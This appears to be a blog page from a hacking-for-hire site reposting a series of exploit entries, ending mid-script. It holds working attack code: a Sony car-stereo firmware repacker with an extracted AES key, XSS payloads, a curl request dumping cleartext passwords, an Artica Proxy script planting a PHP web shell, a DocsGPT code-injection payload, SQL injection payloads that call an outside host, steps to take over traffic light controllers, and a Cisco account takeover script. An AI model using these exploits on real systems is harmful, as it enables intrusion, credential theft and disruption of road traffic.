Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863107035

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Sony XAV-AX5500 Firmware Update Validation Remote Code Execution 
# Date: 11-Feb-2025
# Exploit Author: lkushinada
# Vendor Homepage: https://www.sony.com/et/electronics/in-car-receivers-players/xav-ax5500
# Software Link: https://archive.org/details/xav-ax-5500-v-113
# Version: 1.13
# Tested on: Sony XAV-AX5500
# CVE : CVE-2024-23922

# From NIST CVE Details:
# ====
# This vulnerability allows physically present attackers to execute arbitrary code on affected
# installations of Sony XAV-AX5500 devices. Authentication is not required to exploit this
# vulnerability. The specific flaw exists within the handling of software updates. The issue
# results from the lack of proper validation of software update packages. An attacker can leverage
# this vulnerability to execute code in the context of the device. 
# Was ZDI-CAN-22939
# ====

# # Summary
# Sony's firmware validation for a number of their XAV-AX products relies on symetric cryptography,
# obscurity of their package format, and a weird checksum method instead of any real firmware
# signing mechanism. As such, this can be exploited to craft updates which bypass firmware validation
# and allow a USB-based attacker to obtain RCE on the infotainment unit.

# What's not mentioned in the CVE advisories, is that this method works on the majority of Sony's
# infotainment units and products which use a similar chipset or firmware package format. Tested 
# to work on most firmware versions prior to v2.00.

# # Threat Model
# An attacker with physical access to an automotive media unit can typically utilize other methods
# to achieve a malicious outcome. The reason to investigate the firmware to the extent in this post
# is academic, exploratory, and cautionary, i.e. what other systems are protected in a similar
# manner? if they are, how trivial is it to bypass?

# # Disclaimer
# The information in this article is for educational purposes only.
# Tampering with an automotive system comes with risks which, if you don't understand, you should
# not be undertaking.
# THE AUTHORS DISCLAIM ANY AND ALL RESPONSIBILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES ARISING
# FROM THE USE OF ANYTHING IN THIS DOCUMENT.


# # The Unit
# ## Processors
#  - DAC
#  - System Management Controller (SMC)
#  - Applications Processor
#  - Display Processor

# Coming from a mobile and desktop computer environment, one may be use to thinking about
# the Applications Processor as the most powerful chip in the system in terms of processing power,
# size, power consumption, and system hierarchy. The first oddity of this platform is that the
# application processor is not the most powerful; that honor goes to the DAC, a beefy ARM chip on the
# board.

# The application processor does not appear to be the orchestrator of the components on the system.
# The SMC tkes which takes the role of watchdog, power state management, and input (think remote
# controls, steering wheel button presses) routing.
# For our purposes, it is the Applications processor we're interested in, as it is
# the system responsible for updating the unit via USB.

# ## Interfaces
# We're going to be attacking the unit via USB, as it's the most readily exposed
# interface to owners and would-be attackers.
# Whilst the applications processor does have a UART interface, the most recent iterations of the
# unit do not expose any headers for debugging via UART, and the one active UART line found to be
# active was for message passing between the SMC and app processor, not debug purposes. Similarly, no
# exposed JTAG interfaces were found to be readily exposed on recent iterations of the unit. Sony's
# documentation suggests these are not enabled, but this could not be verified during testing. At the
# very least, JTAG was not found to be exposed on an accessible interface.

# ## Storage
# The boards analyzed had two SPI NOR flash chips, one with an unencrypted firmware image on it. This
# firmware was RARd. The contents of SPI flash was analyzed to determine many of the details
# discussed in this report.

# ## The Updater
# Updates are provided on Sony's support website. A ZIP package is provided with three files:
#  - SHDS1132.up6
#  - SHMC1132.u88
#  - SHSO1132.fir
# The largest of these files (8 meg), the .fir, is in a custom format, and appears encrypted.
# The FIR file has a header which contains the date of firmware publication, the strings KRSELCO and
# SKIP, a chunk of zeros, and then a highish entropy section, and some repeating patterns of interest:

# 00002070  b7 72 10 03 00 8c 82 7e  aa d1 83 58 23 ef 82 5c  |.r.....~...X#..\|
# *
# 00002860  b7 72 10 03 00 8c 82 7e  aa d1 83 58 23 ef 82 5c  |.r.....~...X#..\|

# 00744110  b7 72 10 03 00 8c 82 7e  aa d1 83 58 23 ef 82 5c  |.r.....~...X#..\|
# *
# 00800020  b7 72 10 03 00 8c 82 7e  aa d1 83 58 23 ef 82 5c  |.r.....~...X#..\|


# ## SPI Flash
# Dumping the contents of the SPI flash shows a similar layout, with slightly different offsets:
# 00001fe0  10 10 10 10 10 10 10 10  ff ff ff ff ff ff ff ff  |................|
# 00001ff0  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
# *
# 000027f0  ff ff ff ff ff ff ff ff  ff ff ff ff 00 03 e7 52  |...............R|
# 00002800  52 61 72 21 1a 07 00 cf  90 73 00 00 0d 00 00 00  |Rar!.....s......|
#
# 0007fff0  ff ff ff ff ff ff ff ff  ff ff ff ff 00 6c 40 8b  |.............l@.|
# 00080000  52 61 72 21 1a 07 00 cf  90 73 00 00 0d 00 00 00  |Rar!.....s......|
# ...
# 00744090  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
# *
# 00778000
#
# This given the offsets and spacing, we suspect that the .FIR matches the contents of the SPI.
# Decompressing the RARs at the 0x2800 and 0x80000, we get the recovery and main applications.

# Once we remove the packaging bytes, seeing that the repetive patterns align with FF's, gives
# us a strong indication the encryption function is operating in an ECB-style configuration,
# giving us an avenue, even if we do not recover the key, to potentially make modifications
# to the firmware depending on how the checksum is being calculated.

# ## Firmware
# The recovery application contains the decompression, decryption and checksum methods.
# Putting the recovery_16.bin into ghidra and setting the memory map to load us in at 0x2800,
# we start taking a look at the relevant functions by way of:
# - looking for known strings (KRSELCO)
# - analyizing the logic and looking for obvious "if this passed, begin the update, else fail"
# - looking for things that look like encryption (loads of bitshifting math in one function)
# Of interest to us, there is:
# - 0x0082f4 - a strcmp between KRSELCO and the address the incoming firmware update is at, plus 0x10
# - 0x00897a - a function which sums the total number of bytes until we hit 0xA5A5A5A5
# - 0x02d4ce - the AES decryption function
# - 0x040dd4 - strcmp (?)
# - 0x040aa4 - memcpy (?)
# - 0x046490 - the vendor plus the a number an idiot would use for their luggage, followed by enough
#              padding zeros to get us to a 16 byte key

# This gives us all the information we need, other than making some guesses as to the general package
# and header layout of the update package, to craft an update packager that allows arbitrary
# modification of the firmware.

# # Proof of Concept
# The PoC below will take an existing USB firmware update, decrypt and extract the main binary,
# pause whilst you make modifications (e.g. changing the logic or modifying a message), and repackage
# the update.

# ## Requirements
# - Unixish system
# - WinRar 2.0 (the version the Egyptians built the pyramids with)

# ## Usage
# cve-2024-23922.py path_to_winrar source.fir output.fir

import argparse
import sys
import os
import tempfile
import shutil
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend

# Filenames as found in the .FIR
MAIN_BINARY_NAME="main_16.bin"
MAIN_RAR_NAME="main_16.rar"
DECRYPTED_FILE_NAME="decrypt.bin"
ENCRYPTED_FILE_NAME="encrypt.bin"

# Offsets in the .FIR
HEADER_LENGTH=0x80
RECOVERY_OFFSET=0x2800
MAIN_OFFSET=0x80000
CHECKSUM_OFFSET=0x800000-0x10
CHECKSUM_SIZE=0x4
RAR_LENGTH_OFFSET=0x4
RAR_LENGTH_SIZE=0x4

# From 0x46490 in recovery_16.bin
ENCRYPTION_KEY=b'\x54\x41\x4d\x55\x4c\x31\x32\x33\x34\x00\x00\x00\x00\x00\x00\x00'

def decrypt_file(input_file, output_file):
    backend = default_backend()
    cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend)
    decryptor = cipher.decryptor()

    with open(input_file, 'rb') as file:
        ciphertext = file.read()

    # Strip the unencrypted header
    ciphertext = ciphertext[HEADER_LENGTH:]

    decrypted_data = decryptor.update(ciphertext) + decryptor.finalize()

    with open(output_file, 'wb') as file:
        file.write(decrypted_data)

def aes_encrypt_file(input_file, output_file):
    backend = default_backend()
    cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend)
    encryptor = cipher.encryptor()

    with open(input_file, 'rb') as file:
        plaintext = file.read()

    ciphertext = encryptor.update(plaintext) + encryptor.finalize()

    with open(output_file, 'wb') as file:
        file.write(ciphertext)

def get_sony_32(data):
    csum = int()
    for i in data:
        csum = csum + i
    return csum % 2147483648 # 2^31

def validate_args(winrar_path, source_file, destination_file):
    # Check if the WinRAR executable exists and is a file
    if not os.path.isfile(winrar_path) or not os.access(winrar_path, os.X_OK):
        print(f"[x] Error: The specified WinRAR path '{winrar_path}' is not a valid executable.")
        sys.exit(1)
    
    # Check if the source file exists
    if not os.path.isfile(source_file):
        print(f"[x] Error: The specified source file '{source_file}' does not exist.")
        sys.exit(1)
    
    # Read 8 bytes from offset 0x10 in the source file
    try:
        with open(source_file, 'rb') as f:
            f.seek(0x10)
            signature = f.read(8)
            if signature != b'KRSELECO':
                print(f"[x] Error: The source file '{source_file}' does not contain the expected signature.")
                sys.exit(1)
    except Exception as e:
        print(f"[x] Error: Failed to read from '{source_file}': {e}")
        sys.exit(1)

    # Check if the destination file already exists
    if os.path.exists(destination_file):
        print(f"[x] Error: The destination file '{destination_file}' already exists.")
        sys.exit(1)

def main():
    parser = argparse.ArgumentParser(description="CVE-2024-23922 Sony XAV-AX5500 Firmware Modifier")
    parser.add_argument("winrar_path", help="Path to WinRAR 2.0 executable (yes, the ancient one)")
    parser.add_argument("source_file", help="Path to original .FIR file")
    parser.add_argument("destination_file", help="Path to write the modified .FIR file to")

    args = parser.parse_args()

    validate_args(args.winrar_path, args.source_file, args.destination_file)
    RAR_2_PATH = args.winrar_path
    GOOD_FIRMWARE_FILE = args.source_file
    DESTINATION_FIRMWARE_FILE = args.destination_file

    # make temporary directory
    workdir = tempfile.mkdtemp(prefix="sony_firmware_modifications")

    # copy the good firmware file into the temp directory
    temp_fir_file = os.path.join(workdir, os.path.basename(GOOD_FIRMWARE_FILE))
    shutil.copyfile(GOOD_FIRMWARE_FILE, temp_fir_file)

    print("[+] Cutting the head off and decrypting the contents")
    decrypted_file_path = os.path.join(workdir, DECRYPTED_FILE_NAME)
    decrypt_file(input_file=temp_fir_file, output_file=decrypted_file_path)

    print("[+] Dump out the rar file")
    with open(decrypted_file_path, 'rb') as file:
        # right before the rar file there is a 4 byte length header for the rar file. get that.
        file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET)
        original_rar_length = int.from_bytes(file.read(RAR_LENGTH_SIZE), "big")
        rar_file_bytes = file.read(original_rar_length)

        # now dump that out
        rar_file_path=os.path.join(workdir, MAIN_RAR_NAME)
        with open(rar_file_path, 'wb') as rarfile:
            rarfile.write(rar_file_bytes)

    # check that the stat of the file matches what the header told us
    dumped_rar_size = os.stat(rar_file_path).st_size
    if dumped_rar_size != original_rar_length:
        print("[!] extracted filesizes dont match, there may be corruption", dumped_rar_size, original_rar_length)

    print("[+] Extracting the main binary from the rar file")
    os.system("unrar x " + rar_file_path + " " + workdir)

    print("[!] Okay, I'm now going to wait until you have had a chance to make modifications")
    print("Please modify this file:", os.path.join(workdir, MAIN_BINARY_NAME))
    input()

    print("[+] Continuing")
    print("[+] Putting your main binary back into the rar file")
    os.system("wine " + RAR_2_PATH + " u -tk -ep " + rar_file_path + " " + workdir + "/" + MAIN_BINARY_NAME)

    # we could fix this by writing some FFs
    new_rar_size=os.stat(rar_file_path).st_size
    if dumped_rar_size > os.stat(rar_file_path).st_size:
        print("[!!] The rar size is smaller than the old one. This might cause a problem.")
        print("[!!] Push any key to continue, ctrl+c to abort")
        input()

    with open(decrypted_file_path, 'r+b') as file:
        # right before the rar file there is a 4 byte length header for the rar file. go back there
        file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET)

        # overwrite the old size with the new size
        file.write(new_rar_size.to_bytes(RAR_LENGTH_SIZE, "big"))

        print("[+] Deleting the old rar from the main container")
        # delete the old rar from the main container by FFing it up
        file.write(b'\xFF'*original_rar_length)

        # seek back to the start
        file.seek(MAIN_OFFSET)

        print("[+] Loading the new rar back into the main container")
        with open(rar_file_path, 'rb') as rarfile:
            new_rarfile_bytes = rarfile.read()
            file.write(new_rarfile_bytes)

    print("[+] Updating Checksum")
    with open(decrypted_file_path, 'rb') as file:
        contents = file.read()

    contents = contents[:-0x0010]
    s32_sum = get_sony_32(contents)

    with open(decrypted_file_path, 'r+b') as file:
        file.seek(CHECKSUM_OFFSET)
        # read out the current checksum
        old_checksum_bytes=file.read(CHECKSUM_SIZE)
        print("old checksum:", int.from_bytes(old_checksum_bytes, "big"), old_checksum_bytes)

        # go back and update it with new checksum
        print("new checksum:", s32_sum, hex(s32_sum))
        new_checksum_bytes=s32_sum.to_bytes(CHECKSUM_SIZE, "big")
        file.seek(CHECKSUM_OFFSET)
        file.write(new_checksum_bytes)

    print("[+] Encrypting the main container back up")
    encrypted_file_path = os.path.join(workdir, ENCRYPTED_FILE_NAME)
    aes_encrypt_file(decrypted_file_path, encrypted_file_path)

    print("[+] Reattaching the main container to the header and writing to dest")
    with open(DESTINATION_FIRMWARE_FILE, 'wb') as file:
        with open(temp_fir_file, 'rb') as firfile:
            header = firfile.read(HEADER_LENGTH)
        file.write(header)
        with open(encrypted_file_path, 'rb') as encfile:
            enc_contents = encfile.read()
        file.write(enc_contents)

    print("[+] DONE!!! Any key to delete temp files, ctrl+c to keep them.")
    input()
    shutil.rmtree(workdir)

if __name__ == "__main__":
    main()
HireHackking 
# Exploit Title: jQuery Prototype Pollution & XSS Exploit (CVE-2019-11358 & CVE-2020-7656)
# Google Dork: N/A
# Date: 2025-02-13
# Exploit Author: xOryus
# Vendor Homepage: https://jquery.com
# Software Link: https://code.jquery.com/jquery-3.3.1.min.js
# Version: 3.3.1
# Tested on: Windows 10, Ubuntu 20.04, Chrome 120, Firefox 112
# CVE : CVE-2019-11358, CVE-2020-7656
# Category: WebApps

# Description:
# This exploit abuses two vulnerabilities in jQuery:
# - CVE-2020-7656: XSS via improper script handling
# - CVE-2019-11358: Prototype Pollution leading to XSS
# By injecting payloads into a vulnerable page using jQuery <3.4.X, attackers can execute arbitrary JavaScript in the victim's browser.
#
# Usage:
# 1. Load this script in a page that includes jQuery 3.3.1
# 2. Observe two XSS alerts via script injection and prototype pollution.

# PoC (Proof of Concept):
# ------------------------------------

/*
 * Exploit for CVE-2020-7656 and CVE-2019-11358
 * Injects malicious JavaScript into a vulnerable page using jQuery <3.4.X
 */

COPY ALL PAYLOAD AND INSERT ON SITE AND IN BROWSER CONSOLE (F12)

// 1. Load vulnerable jQuery (version 3.3.1)
const script = document.createElement('script');
script.src = "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js";
document.head.appendChild(script);

// 2. Function to execute after jQuery is loaded
script.onload = function() {
    console.log("[+] Vulnerable jQuery loaded!");

    // 3. Inject malicious content for XSS (CVE-2020-7656)
    const maliciousContent = "<script>alert('XSS via CVE-2020-7656: ' + document.domain)</script >"; // Space after </script>
    $('body').append(maliciousContent);
    console.log("[+] XSS payload (CVE-2020-7656) injected. Alert will be displayed.");

    // 4. Exploit Prototype Pollution (CVE-2019-11358)
    const defaultConfig = {
        "backLink": "<a href='https://example.com'>Go Back</a>"
    };

    const maliciousParams = {
        "__proto__": {
            "backLink": "<svg onload=alert('XSS via CVE-2019-11358: Prototype Pollution!')>"
        }
    };

    // 5. Merge objects using vulnerable $.extend
    let config = $.extend(true, defaultConfig, maliciousParams);
    console.log("[+] Prototype Pollution executed via $.extend().");

    // 6. Create a container to inject malicious content
    const container = document.createElement('div');
    container.id = 'backLinkContainer';
    document.body.appendChild(container);

    // 7. Inject malicious content into the DOM
    $('#backLinkContainer').html(config.backLink);
    console.log("[+] XSS payload (CVE-2019-11358) injected into the DOM. Alert will be displayed.");
};

// 8. Instruction message
console.log("[*] Script injected. Waiting for jQuery to load...");
HireHackking 
# Exploit Title: Information Disclosure in GeoVision GV-ASManager
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.0.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56902
# PoC: https://github.com/DRAGOWN/CVE-2024-56902


Information disclosure vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less.

Requirements
To perform successful attack an attacker requires:
- GeoVision ASManager version 6.1.0.0 or less
- Network access to the GV-ASManager web application (there are cases when there are public access)
- Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: <blank>)

Impact
The vulnerability can be leveraged to perform the following unauthorized actions:
A low privilege account is able to:
- Enumerate user accounts
- Retrieve cleartext password of any account in GV-ASManager.
After reusing the retrieved password, an attacker will be able to:
- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras, access controls.
- Clone and duplicate access control data for further attack scenarios.
- Reusing retrieved password in other digital assets of the organization.

cURL script:

curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: [SET-TARGET]' -H $'Content-Length: 41' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'X-Requested-With: XMLHttpRequest' -H $'Accept-Language: en-US,en;q=0.9' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: */*' -H $'Origin: https://192.168.50.129' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=1, i' -H $'Connection: keep-alive' \
   -b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
    --data-binary $'action=UA_GetAllUserAccount&node=xnode-98' \
    $'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'


After a successful attack, you will get access to:
- ASWeb	- Access & Security Management 
- TAWeb	- Time and Attendance Management 
- VMWeb	- Visitor Management 
- ASManager - Access & Security Management software in OS
HireHackking 
# Exploit Title: Artica Proxy 4.50 - Remote Code Execution (RCE)
# Date: 23-04-2024
# Exploit Author: Madan
# Vendor Homepage: https://artica-proxy.com/
# Version: 4.40, 4.50
# Tested on: [relevant os]
# CVE : CVE-2024-2054

you can also find the exploit on my github repo:
https://github.com/Madan301/CVE-2024-2054


import requests
import base64
import urllib3
from colorama import Fore

print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might
sometimes vary from how artica proxy interface is hosted")

URL = input("Enter url: ")
if URL[-1]=="/":
    ACTUAL_URL = URL[:-1]
else:
    ACTUAL_URL = URL

ARTICA_URL = ACTUAL_URL

def check(ARTICA_URL):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    try:
        check = requests.get(ARTICA_URL+'/wizard/wiz.upload.php',verify=False)
    except Exception as e:
        print(Fore.RED+"Could not reach, check URL")
    if check.status_code==200:
        print(Fore.GREEN+"Vulnerable")
        return True
    else:
        print(Fore.RED+"Not Vulnerable")


def exploit(ARTICA_URL):

    payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
    payload_data = {
        "TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
            "cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
            "cache_serializer": "json",
            "cache_size": 999999999,
            "cache_data": {
                payload: {
                    "cache_date": 0,
                    "ttl": 999999999
                }
            }
        }
    }


    while True:
        PAYLOAD_CMD = input("enter command: ")
        url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        response = requests.get(url, verify=False)
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        if response.status_code == 200:
            cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
            cmd_response = requests.get(cmd_url, verify=False)
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
            print(cmd_response.text)
        else:
            print("Failed to execute the payload")

check = check(ARTICA_URL=ACTUAL_URL)
if check==True:
    exploit(ARTICA_URL=ARTICA_URL)
HireHackking

DocsGPT 0.12.0 - Remote Code Execution

HACKER · %s · %s

# Exploit Title: DocsGPT 0.12.0 - Remote Code Execution # Date: 09/04/2025 # Exploit Author: Shreyas Malhotra (OSMSEC) # Vendor Homepage: https://github.com/arc53/docsgpt # Software Link: https://github.com/arc53/DocsGPT/archive/refs/tags/0.12.0.zip # Version: 0.8.1 through 0.12.0 # Tested on: Debian Linux/Ubuntu Linux/Kali Linux # CVE: CVE-2025-0868 import requests # TARGET CONFIG TARGET = "http://10.0.2.15:7091" # Change this # Malicious payload string - carefully escaped - modify the python code if necessary malicious_data = ( 'user=1&source=reddit&name=other&data={"source":"reddit",' '"client_id":"1111","client_secret":1111,"user_agent":"111",' '"search_queries":[""],"number_posts":10,' '"rce\\\\":__import__(\'os\').system(\'touch /tmp/test\')}#":11}' ) headers = { "Content-Type": "application/x-www-form-urlencoded" } try: response = requests.post(f"{TARGET}/api/remote", headers=headers, data=malicious_data) print(f"[+] Status Code: {response.status_code}") print("[+] Response Body:") print(response.text) except Exception as e: print(f"[-] Error sending request: {e}")
HireHackking

Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS) # Date: 04/28/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://anchorcms.com/ # Software Link: https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip # Version: latest # Tested on: MacOS # Log in to Anchor CMS. # Click on "Create New Post". # Fill in the "Title" and enter the following payload in the field immediately below: # "><script>alert()</script> # Go to the homepage, and you will see the alert! ### PoC Request ### POST /anchor/admin/posts/edit/2 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Content-Length: 278 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/anchor/admin/posts/edit/2 Cookie: PHPSESSID=8d8apa3ko6alt5t6jko2e0mrta; anchorcms=hlko7b1dbdpjgn58himf2obht5 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false
HireHackking
# Exploit Title: Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE) # Google Dork: N/A # Date: 07/09/2024 # Exploit Author: Andrew Lemon/Red Threat https://redthreatsec.com # Vendor Homepage: https://www.q-free.com # Software Link: N/A # Version: 1.9 # Tested on: (Intelight x-1) Linux 3.14.57 # CVE : CVE-2024-38944 ## Vulnerability Description This vulnerability allows remote attackers to bypass authentication on affected installations of MaxTime Database Editor. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI on Traffic Controllers running version 1.9.x firmware. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to gain full control of Intelight Traffic Controllers and modify the configuration of a traffic intersection, modify traffic light sequences, or trigger the intersection to go into 4 way flash causing a denial of service and causing traffic congestion. ## Steps to Reproduce Navigate to the IP address of an identified controller When prompted for authentication append /cgi-bin/generateForm.cgi?formID=142 to the end of the IP address Under the web security tab change the drop down from enabled to disabled and select apply or take note of the username and password and login with those.
HireHackking

Feng Office 3.11.1.2 - SQL Injection

HACKER · %s · %s

# Exploit Title: Feng Office 3.11.1.2 - SQL Injection # Date: 7/2024 # Exploit Author: Andrey Stoykov # Version: 3.11.1.2 # Tested on: Ubuntu 22.04 # Blog: http://msecureltd.blogspot.com SQL Injection: 1. Login to application 2. Click on "Workspaces" 3. Copy full URL 4. Paste the HTTP GET request into text file 5. Set the injection point to be in the "dim" parameter value 6. Use SQLMap to automate the process sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=3Dmysql -p dim = --fingerprint [...] [12:13:03] [INFO] confirming MySQL [12:13:04] [INFO] the back-end DBMS is MySQL [12:13:04] [INFO] actively fingerprinting MySQL [12:13:05] [INFO] executing MySQL comment injection fingerprint web application technology: Apache back-end DBMS: active fingerprint: MySQL >=3D 5.7 comment injection fingerprint: MySQL 5.7.37 [...]
HireHackking

ChurchCRM 5.9.1 - SQL Injection

HACKER · %s · %s

# Exploit Title: ChurchCRM 5.9.1 - SQL Injection # Author: Sanan Qasimzada # Date: 06.07.2024 # Vendor: http://churchcrm.io/ # Software: https://github.com/ChurchRM/CRM # Reference: https://portswigger.net/web-security/sql-injection # Description: In the manual insertion point 1 - parameter `EID` appears to be vulnerable to SQL injection attacks. No need for cookies, no need admin authentication and etc. The attacker easily can steal information from this system by using this vulnerability. STATUS: HIGH Vulnerability - CRITICAL [+]Payload: ```mysql --- Parameter: EID (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: EID=(select load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com \\ior')) OR NOT 2407=2407 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: EID=(select load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com \\ior')) AND (SELECT 9547 FROM (SELECT(SLEEP(3)))QEvX) Type: UNION query Title: MySQL UNION query (UTF8) - 11 columns Payload: EID=(select load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com \\ior')) UNION ALL SELECT 'UTF8','UTF8',CONCAT(0x716a6b7a71,0x57646e6842556a56796a75716b504b4d6941786f7578696a4c557449796d76425645505670694b42,0x717a7a7871),'UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8'# --- ``` # Reproduce: [href]( https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ChurchCRM/2023/ChurchCRM-4.5.3-121fcc1 ) # Proof and Exploit: [href](https://streamable.com/1eqhw2) # Time spend: 01:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
HireHackking

Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover

HACKER · %s · %s

# Exploit Title: Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover # Google Dork: N/A # Date: 21/07/2024 # Exploit Author: Mohammed Adel # Vendor Homepage: https://www.cisco.com # Software Link: https://www.cisco.com/c/en/us/products/collateral/cloud-systems-management/smart-software-manager-satellite/datasheet-c78-734539.html # Version: 8-202206 and earlier # Tested on: Kali Linux # CVE : CVE-2024-20419 # Security Advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy # Technical Analysis: https://www.0xpolar.com/blog/CVE-2024-20419 import requests, sys from urllib.parse import unquote # Suppress SSL warnings requests.packages.urllib3.disable_warnings() Domain = sys.argv[1] # Domain, https://0xpolar.com:8443 Username = sys.argv[2] # Username, by default its [admin] password = "Polar@123456780" print("[*] Cisco Smart Software Manager On-Prem") print("[*] Account Takeover Exploit") print("[*] Target: "+Domain) print("[*] Username: "+Username) print("\n") print("[*] Getting Necessary Tokens..") get_url = Domain+"/backend/settings/oauth_adfs?hostname=polar" response = requests.get(get_url, verify=False) def get_cookie_value(headers, cookie_name): cookies = headers.get('Set-Cookie', '').split(',') for cookie in cookies: if cookie_name in cookie: parts = cookie.split(';') for part in parts: if cookie_name in part: return part.split('=')[1].strip() return None set_cookie_headers = response.headers.get('Set-Cookie', '') xsrf_token = get_cookie_value(response.headers, 'XSRF-TOKEN') lic_engine_session = get_cookie_value(response.headers, '_lic_engine_session') if xsrf_token: xsrf_token = unquote(xsrf_token) if not lic_engine_session or not xsrf_token: print("Required cookies not found in the response.") else: print("[+] lic_engine_session: "+lic_engine_session) print("[+] xsrf_token: "+xsrf_token) print("\n[*] Generating Auth Token") post_url = Domain+"/backend/reset_password/generate_code" headers = { 'Accept': 'application/json', 'Content-Type': 'application/json', 'X-Xsrf-Token': xsrf_token, 'Sec-Ch-Ua': '', 'Sec-Ch-Ua-Mobile': '?0', } cookies = { '_lic_engine_session': lic_engine_session, 'XSRF-TOKEN': xsrf_token, } payload = { 'uid': Username } post_response = requests.post(post_url, headers=headers, cookies=cookies, json=payload, verify=False) post_response_json = post_response.json() auth_token = post_response_json.get('auth_token') if not auth_token: print("auth_token not found in the response.") else: print("[+] Auth Token: "+auth_token) print("\n[*] Setting Up a New Password") final_post_url = 